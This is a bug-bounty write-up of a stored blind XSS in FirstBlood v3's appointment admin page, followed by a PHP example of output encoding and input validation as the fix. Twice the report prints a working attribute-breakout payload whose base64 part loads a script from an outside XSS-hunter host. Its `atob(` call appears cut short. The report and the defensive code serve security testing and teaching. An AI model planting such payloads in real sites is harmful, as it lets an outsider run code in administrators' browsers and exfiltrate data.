FirstBlood-#1608 — Blind XSS on Internal Dashboard of Administrator (Manage Appointments)
This issue was discovered on FirstBlood v3
On 2022-12-12, mr_xhunt
Found a blind XSS on the internal administrator dashboard, where the administrator can view and manage appointments.
Steps To Reproduce:
- Create an appointment and intercept the request in Burp Suite.
- In Burp Suite, change the `fname` parameter to the payload: x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
  NOTE: You must also add the `ambulance` parameter with a value of 1.

- Wait a few hours or days (mine executed after a few days); the XSS will then fire.

An attacker can run arbitrary scripts in the administrator's browser, fuzz all the endpoints reachable from there, and exfiltrate the returned data to a webhook URL.
Any parameter that is inserted directly into the page source must be sanitized first and checked for malicious content.
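The root cause described above is a value from the booking form being written into an HTML attribute on the admin page without encoding, so a `"` in `fname` closes the attribute and the rest of the payload becomes live markup. The following is an added example (not FirstBlood's code) of the unsafe rendering pattern beside a hardened version; the `$appointments` row shape, the helper names and the sample payload string are all constructed for illustration, and the real `manage_appointment.php` is not assumed to look like this.

```php
<?php
// Added example, not the FirstBlood application's own code.
// Demonstrates why context-aware output encoding (not just input filtering)
// stops the attribute-breakout XSS in the "manage appointments" view.

// Constructed sample row: fname carries the same x"><img ... onerror=...> shape
// as the reported payload, with a harmless probe in place of the real handler.
$appointments = [
    ['id' => 1, 'fname' => 'x"><img src=x onerror=alert(1)>', 'ambulance' => 1],
    ['id' => 2, 'fname' => "O'Brien", 'ambulance' => 1],
];

// Vulnerable pattern: untrusted value concatenated straight into an attribute.
// For row 1 the double quote terminates value="..." and <img onerror=...> is
// parsed as a real element when the admin opens the page.
function render_row_unsafe(array $row): string
{
    return '<tr><td>' . $row['id'] . '</td>'
         . '<td><input name="fname" value="' . $row['fname'] . '"></td></tr>';
}

// Hardened pattern: encode for the HTML context at output time.
//  - ENT_QUOTES encodes both " and ' so the value can never close an attribute
//    regardless of which quote style the template uses.
//  - ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning "" (a silent
//    empty string would hide a record from the admin rather than protect it).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $row): string
{
    return '<tr><td>' . h((string) $row['id']) . '</td>'
         . '<td><input name="fname" value="' . h($row['fname']) . '"></td></tr>';
}

// Defence in depth at booking time (constructed policy): a person's name has no
// business containing angle brackets or quotes, so reject them server-side too.
// This is a backstop, not a replacement for encoding on output.
function validate_fname(string $fname): bool
{
    $len = mb_strlen($fname, 'UTF-8');
    if ($len < 1 || $len > 100) {
        return false;
    }
    return preg_match('/[<>"\'`=]/u', $fname) === 0;
}

foreach ($appointments as $row) {
    echo "unsafe: " . render_row_unsafe($row) . PHP_EOL;
    echo "safe:   " . render_row_safe($row) . PHP_EOL;
    echo "valid at booking: " . (validate_fname($row['fname']) ? 'yes' : 'no') . PHP_EOL;
}
```

For the first row the safe renderer emits `value="x&quot;&gt;&lt;img src=x onerror=alert(1)&gt;"`, which the browser displays as literal text inside the input. A Content-Security-Policy that disallows inline event handlers and restricts `script-src` would have limited what the stored payload could do even before the encoding fix, which is why both measures belong together on an internal admin panel.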
Endpoint: /manage_appointment.php
Parameter: fname
Payload: x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
FirstBlood ID: 78
Vulnerability Type: Stored XSS
When booking an appointment with the ambulance value set to "1", the user's full name is vulnerable to stored XSS on the internal admin panel.